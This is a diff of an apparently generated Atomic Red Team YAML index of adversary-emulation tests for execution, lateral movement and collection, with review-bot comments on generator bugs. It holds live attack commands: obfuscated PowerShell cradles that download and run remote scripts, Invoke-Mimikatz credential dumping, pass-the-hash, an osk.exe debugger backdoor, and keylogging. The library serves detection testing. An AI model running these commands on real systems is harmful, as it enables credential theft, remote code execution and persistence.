@@ -13080,14 +13573,26 @@ execution:
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
- name: Mimikatz - Cradlecraft PsSendKeys
description: |
Run mimikatz via PsSendKeys
description: 'Run mimikatz via PsSendKeys
'
supported_platforms:
- windows
executor:
name: powershell
command: |
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
command: "$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object
-ComObject WScript.Shell;$reg='HKCU:\\Software\\Microsoft\\Notepad';$app='Notepad';$props=(Get-ItemProperty
$reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP
$reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item
Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep
-Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds
500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable
_).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item
Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable
_).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item
Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP
$reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz
-dumpcr\n"
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
@@ -13101,8 +13606,9 @@ execution:
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
C:\Windows\System32\cmd.exe
- name: PowerShell Add User
description: |
Using PS 5.1, add a user via CLI
description: 'Using PS 5.1, add a user via CLI
'
supported_platforms:
- windows
input_arguments:
@@ -13124,8 +13630,10 @@ execution:
default: Atomic Things
executor:
name: command_prompt
command: |
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
command: 'New-LocalUser -FullName ''#{full_name}'' -Name ''#{user_name}''
-Password #{password} -Description ''#{description}''
'
- name: Powershell MsXml COM object
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -13140,8 +13648,11 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
command: |
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
command: 'powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object
-ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
'
- name: Powershell XML requests
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -13155,8 +13666,11 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
executor:
name: command_prompt
command: |
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
command: '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec
bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
| IEX"
'
- name: Powershell invoke mshta.exe download
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -13170,8 +13684,9 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
executor:
name: powershell
command: |
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
command: '"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
'
- name: Powershell Invoke-DownloadCradle
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -13184,8 +13699,10 @@ execution:
1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
- name: PowerShell Fileless Script Execution
description: |
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
description: 'Execution of a PowerShell payload from the Windows Registry similar
to that seen in fileless malware infections.
'
supported_platforms:
- windows
executor:
@@ -13258,8 +13775,9 @@ execution:
identifier: T1121
atomic_tests:
- name: Regasm Uninstall Method Call Test
description: |
Executes the Uninstall Method, No Admin Rights Required
description: 'Executes the Uninstall Method, No Admin Rights Required
'
supported_platforms:
- windows
input_arguments:
@@ -13278,8 +13796,10 @@ execution:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
del #{file_name}
- name: Regsvs Uninstall Method Call Test
description: |
Executes the Uninstall Method, No Admin Rights Required, Requires SNK
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
SNK
'
supported_platforms:
- windows
input_arguments:
@@ -13379,8 +13899,10 @@ execution:
identifier: T1117
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -13390,11 +13912,14 @@ execution:
default: C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct
executor:
name: command_prompt
command: |
regsvr32.exe /s /u /i:#(unknown) scrobj.dll
command: 'regsvr32.exe /s /u /i:#(unknown) scrobj.dll
'
- name: Regsvr32 remote COM scriptlet execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
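Review bot: The local COM scriptlet command in this hunk carries `#(unknown)` where the neighbouring regsvr32 tests carry a `#{...}` reference into `input_arguments`, so the rendered entry no longer points at the argument it declares; the same `#(unknown)` token appears in the MSBuild command of the T1127 hunk. This looks like the generator's substitute for a reference it could not resolve rather than author intent, and writing it silently means the index is published with a broken cross-reference. The generator should fail the build, or at minimum log the technique and test name, when a command references an input argument it cannot resolve, instead of emitting `#(unknown)` into the output.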
@@ -13404,11 +13929,14 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct
executor:
name: command_prompt
command: |
regsvr32.exe /s /u /i:#{url} scrobj.dll
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
'
- name: Regsvr32 local DLL execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -13418,8 +13946,10 @@ execution:
default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
executor:
name: command_prompt
command: |
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
command: '"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
'
T1085:
technique:
name: Rundll32
@@ -13486,8 +14016,9 @@ execution:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: |
Test execution of a remote script using rundll32.exe
description: 'Test execution of a remote script using rundll32.exe
'
supported_platforms:
- windows
input_arguments:
@@ -13497,8 +14028,9 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
executor:
name: command_prompt
command: |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
'
T1053:
technique:
name: Scheduled Task
@@ -13598,8 +14130,9 @@ execution:
- windows
executor:
name: command_prompt
command: |
at 13:20 /interactive cmd
command: 'at 13:20 /interactive cmd
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -13615,11 +14148,13 @@ execution:
default: 72600
executor:
name: command_prompt
command: |
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
- name: Scheduled task Remote
description: |
Create a task on a remote system
description: 'Create a task on a remote system
'
supported_platforms:
- windows
input_arguments:
@@ -13645,8 +14180,10 @@ execution:
default: At0micStrong
executor:
name: command_prompt
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
T1064:
technique:
name: Scripting
@@ -13720,8 +14257,9 @@ execution:
identifier: T1064
atomic_tests:
- name: Create and Execute Bash Shell Script
description: |
Creates and executes a simple bash script.
description: 'Creates and executes a simple bash script.
'
supported_platforms:
- macos
- linux
@@ -13858,8 +14396,10 @@ execution:
identifier: T1216
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
description: |
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
'
supported_platforms:
- windows
input_arguments:
@@ -13869,8 +14409,10 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
executor:
name: command_prompt
command: |
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
'
T1153:
technique:
name: Source
@@ -13916,8 +14458,9 @@ execution:
identifier: T1153
atomic_tests:
- name: Execute Script using Source
description: |
Creates a script and executes it using the source command
description: 'Creates a script and executes it using the source command
'
supported_platforms:
- macos
- linux
@@ -13928,8 +14471,10 @@ execution:
chmod +x /tmp/art.sh
source /tmp/art.sh
- name: Execute Script using Source Alias
description: |
Creates a script and executes it using the source command's dot alias
description: 'Creates a script and executes it using the source command''s dot
alias
'
supported_platforms:
- macos
- linux
@@ -13995,8 +14540,9 @@ execution:
identifier: T1151
atomic_tests:
- name: Space After Filename
description: |
Space After Filename
description: 'Space After Filename
'
supported_platforms:
- macos
executor:
@@ -14208,8 +14754,9 @@ execution:
identifier: T1127
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks
description: |
Executes the code in a project file using. C# Example
description: 'Executes the code in a project file using. C# Example
'
supported_platforms:
- windows
input_arguments:
@@ -14219,11 +14766,15 @@ execution:
default: T1127.csproj
executor:
name: command_prompt
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
'
- name: MSXSL Bypass using local files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a local payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
supported_platforms:
- windows
input_arguments:
@@ -14237,11 +14788,15 @@ execution:
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
- name: MSXSL Bypass using remote files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a remote payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
supported_platforms:
- windows
input_arguments:
@@ -14255,8 +14810,9 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
T1047:
technique:
name: Windows Management Instrumentation
@@ -14327,35 +14883,42 @@ execution:
identifier: T1047
atomic_tests:
- name: WMI Reconnaissance Users
description: |
WMI List User Accounts
description: 'WMI List User Accounts
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wmic useraccount get /ALL
command: 'wmic useraccount get /ALL
'
- name: WMI Reconnaissance Processes
description: |
WMI List Processes
description: 'WMI List Processes
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wmic process get caption,executablepath,commandline
command: 'wmic process get caption,executablepath,commandline
'
- name: WMI Reconnaissance Software
description: |
WMI List Software
description: 'WMI List Software
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wmic qfe get description,installedOn /format:csv
command: 'wmic qfe get description,installedOn /format:csv
'
- name: WMI Reconnaissance List Remote Services
description: |
WMI List Remote Services
description: 'WMI List Remote Services
'
supported_platforms:
- windows
input_arguments:
@@ -14369,8 +14932,10 @@ execution:
default: sql server
executor:
name: command_prompt
command: |
wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%")
command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}
(%")
'
T1028:
technique:
name: Windows Remote Management
@@ -14429,14 +14994,16 @@ execution:
identifier: T1028
atomic_tests:
- name: Enable Windows Remote Management
description: |
Powershell Enable WinRM
description: 'Powershell Enable WinRM
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Enable-PSRemoting -Force
command: 'Enable-PSRemoting -Force
'
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
@@ -14453,11 +15020,14 @@ execution:
default: computer1
executor:
name: command_prompt
command: |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
'
- name: WMIC Process Call Create
description: |
Utilize WMIC to start remote process
description: 'Utilize WMIC to start remote process
'
supported_platforms:
- windows
input_arguments:
@@ -14475,11 +15045,16 @@ execution:
default: Target
executor:
name: command_prompt
command: |
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
command: 'wmic /user:#{user_name} /password:#{password} /node:#{computer_name}
process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
/t REG_SZ /d \"cmd.exe\" /f"
'
- name: Psexec
description: |
Utilize psexec to start remote process
description: 'Utilize psexec to start remote process
'
supported_platforms:
- windows
input_arguments:
@@ -14497,11 +15072,13 @@ execution:
default: Target
executor:
name: command_prompt
command: |
psexec \\host -u domain\user -p password -s cmd.exe
command: 'psexec \\host -u domain\user -p password -s cmd.exe
'
- name: Invoke-Command
description: |
Execute Invoke-command on remote host
description: 'Execute Invoke-command on remote host
'
supported_platforms:
- windows
input_arguments:
@@ -14515,8 +15092,9 @@ execution:
default: ipconfig
executor:
name: powershell
command: |
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
command: 'invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
'
lateral-movement:
T1155:
technique:
@@ -14584,8 +15162,10 @@ lateral-movement:
- macos
executor:
name: sh
command: |
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\" | python &""
command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\"
| python &""
'
'':
technique:
name: Third-party Software
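Review bot: The technique that follows the regenerated osascript command is keyed as `'':` (an empty string) rather than a `T####` identifier like the sibling keys under `lateral-movement`, and the same empty key appears for 'Video Capture' under `collection`; presumably the generator uses the technique's `identifier` as the key and this one is missing. A technique filed under `''` cannot be linked or looked up by id, and if a second identifier-less technique lands under the same tactic the later one silently replaces the earlier, since YAML mappings do not permit duplicate keys and most loaders keep the last value. The generator should validate that every technique has a non-empty `identifier` before writing the index and fail loudly otherwise, rather than emitting `''` as the key.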
@@ -14710,8 +15290,9 @@ lateral-movement:
identifier: T1037
atomic_tests:
- name: Logon Scripts
description: |
Added Via Reg.exe
description: 'Added Via Reg.exe
'
supported_platforms:
- windows
input_arguments:
@@ -14721,11 +15302,14 @@ lateral-movement:
default: cmd.exe /c calc.exe
executor:
name: command_prompt
command: |
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}"
command: 'REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ
/d "#{script_command}"
'
- name: Logon Scripts - Mac
description: |
Mac logon script
description: 'Mac logon script
'
supported_platforms:
- macos
executor:
@@ -14806,11 +15390,13 @@ lateral-movement:
default: cc36cf7a8514893efccd3324464tkg1a
executor:
name: command_prompt
command: |
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
command: 'mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
'
- name: Mimikatz Kerberos Ticket Attack
description: |
Similar to PTH, but attacking Kerberos
description: 'Similar to PTH, but attacking Kerberos
'
supported_platforms:
- windows
input_arguments:
@@ -14824,8 +15410,9 @@ lateral-movement:
default: atomic.local
executor:
name: command_prompt
command: |
mimikatz # kerberos::ptt #{user_name}@#{domain}
command: 'mimikatz # kerberos::ptt #{user_name}@#{domain}
'
T1076:
technique:
name: Remote Desktop Protocol
@@ -14900,8 +15487,11 @@ lateral-movement:
identifier: T1076
atomic_tests:
- name: RDP
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
description: 'RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6)
- how to hijack RDS and RemoteApp sessions transparently to move through an
organization
'
supported_platforms:
- windows
executor:
@@ -14967,8 +15557,9 @@ lateral-movement:
identifier: T1105
atomic_tests:
- name: xxxx
description: |
xxxx
description: 'xxxx
'
supported_platforms:
- linux
- macos
@@ -15096,8 +15687,9 @@ lateral-movement:
identifier: T1077
atomic_tests:
- name: Map admin share
description: |
Connecting To Remote Shares
description: 'Connecting To Remote Shares
'
supported_platforms:
- windows
input_arguments:
@@ -15119,11 +15711,14 @@ lateral-movement:
default: Target
executor:
name: command_prompt
command: |
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
/u:#{user_name}"
'
- name: Map Admin Share PowerShell
description: |
Map Admin share utilizing PowerShell
description: 'Map Admin share utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -15141,8 +15736,9 @@ lateral-movement:
default: g
executor:
name: powershell
command: |
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
'
T1028:
technique:
name: Windows Remote Management
@@ -15201,14 +15797,16 @@ lateral-movement:
identifier: T1028
atomic_tests:
- name: Enable Windows Remote Management
description: |
Powershell Enable WinRM
description: 'Powershell Enable WinRM
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Enable-PSRemoting -Force
command: 'Enable-PSRemoting -Force
'
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
@@ -15225,11 +15823,14 @@ lateral-movement:
default: computer1
executor:
name: command_prompt
command: |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
'
- name: WMIC Process Call Create
description: |
Utilize WMIC to start remote process
description: 'Utilize WMIC to start remote process
'
supported_platforms:
- windows
input_arguments:
@@ -15247,11 +15848,16 @@ lateral-movement:
default: Target
executor:
name: command_prompt
command: |
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
command: 'wmic /user:#{user_name} /password:#{password} /node:#{computer_name}
process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
/t REG_SZ /d \"cmd.exe\" /f"
'
- name: Psexec
description: |
Utilize psexec to start remote process
description: 'Utilize psexec to start remote process
'
supported_platforms:
- windows
input_arguments:
@@ -15269,11 +15875,13 @@ lateral-movement:
default: Target
executor:
name: command_prompt
command: |
psexec \\host -u domain\user -p password -s cmd.exe
command: 'psexec \\host -u domain\user -p password -s cmd.exe
'
- name: Invoke-Command
description: |
Execute Invoke-command on remote host
description: 'Execute Invoke-command on remote host
'
supported_platforms:
- windows
input_arguments:
@@ -15287,8 +15895,9 @@ lateral-movement:
default: ipconfig
executor:
name: powershell
command: |
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
command: 'invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
'
collection:
T1123:
technique:
@@ -15334,8 +15943,9 @@ collection:
identifier: T1123
atomic_tests:
- name: SourceRecorder via Windows command prompt
description: |
Create a file called test.wma, with the duration of 30 seconds
description: 'Create a file called test.wma, with the duration of 30 seconds
'
supported_platforms:
- windows
input_arguments:
@@ -15349,17 +15959,18 @@ collection:
default: 30
executor:
name: command_prompt
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
command: 'SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
'
- name: PowerShell Cmdlet via Windows command prompt
description: |
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n"
supported_platforms:
- windows
executor:
name: command_prompt
command: |
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
'
T1119:
technique:
name: Automated Collection
@@ -15413,8 +16024,9 @@ collection:
identifier: T1119
atomic_tests:
- name: Automated Collection Command Prompt
description: |
Automated Collection
description: 'Automated Collection
'
supported_platforms:
- windows
executor:
@@ -15423,14 +16035,17 @@ collection:
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
- name: Automated Collection PowerShell
description: |
Automated Collection
description: 'Automated Collection
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
command: 'Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName
-destination c:\temp}
'
T1115:
technique:
name: Clipboard Data
@@ -15473,8 +16088,9 @@ collection:
identifier: T1115
atomic_tests:
- name: Utilize Clipboard to store or execute commands from
description: |
Add data to clipboard to copy off or execute commands from.
description: 'Add data to clipboard to copy off or execute commands from.
'
supported_platforms:
- windows
executor:
@@ -15483,8 +16099,10 @@ collection:
dir | clip
clip < readme.txt
- name: PowerShell
description: |
Utilize PowerShell to echo a command to clipboard and execute it
description: 'Utilize PowerShell to echo a command to clipboard and execute
it
'
supported_platforms:
- windows
executor:
@@ -15532,14 +16150,18 @@ collection:
identifier: T1074
atomic_tests:
- name: Stage data from Discovery.bat
description: |
Utilize powershell to download discovery.bat and save to a local file
description: 'Utilize powershell to download discovery.bat and save to a local
file
'
supported_platforms:
- windows
executor:
name: powershell
command: |
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat'')"
> c:\windows\pi.log
'
'':
technique:
name: Video Capture
@@ -15670,8 +16292,7 @@ collection:
default: c:\key.log
executor:
name: powershell
command: |
.\Get-Keystrokes.ps1 -LogPath #{filepath}
command: ".\\Get-Keystrokes.ps1 -LogPath #{filepath}\n"
T1113:
technique:
name: Screen Capture
@@ -15720,42 +16341,49 @@ collection:
identifier: T1113
atomic_tests:
- name: Screencapture
description: |
Use screencapture command to collect a full desktop screenshot
description: 'Use screencapture command to collect a full desktop screenshot
'
supported_platforms:
- macos
input_arguments:
output_file:
description: |
xxx
description: 'xxx
'
type: Path
default: desktop.png
executor:
name: bash
command: screencapture
- name: Screencapture (silent)
description: |
Use screencapture command to collect a full desktop screenshot
description: 'Use screencapture command to collect a full desktop screenshot
'
supported_platforms:
- macos
input_arguments:
output_file:
description: |
xxx
description: 'xxx
'
type: Path
default: desktop.png
executor:
name: bash
command: screencapture -x
- name: X Windows Capture
description: |
Use xwd command to collect a full desktop screenshot and review file with xwud
description: 'Use xwd command to collect a full desktop screenshot and review
file with xwud
'
supported_platforms:
- linux
input_arguments:
output_file:
description: |
xxx
description: 'xxx
'
type: Path
default: desktop.xwd
executor:
@@ -15764,14 +16392,16 @@ collection:
xwd -root -out #{output_file}
xwud -in #{output_file}
- name: Import
description: |
Use import command to collect a full desktop screenshot
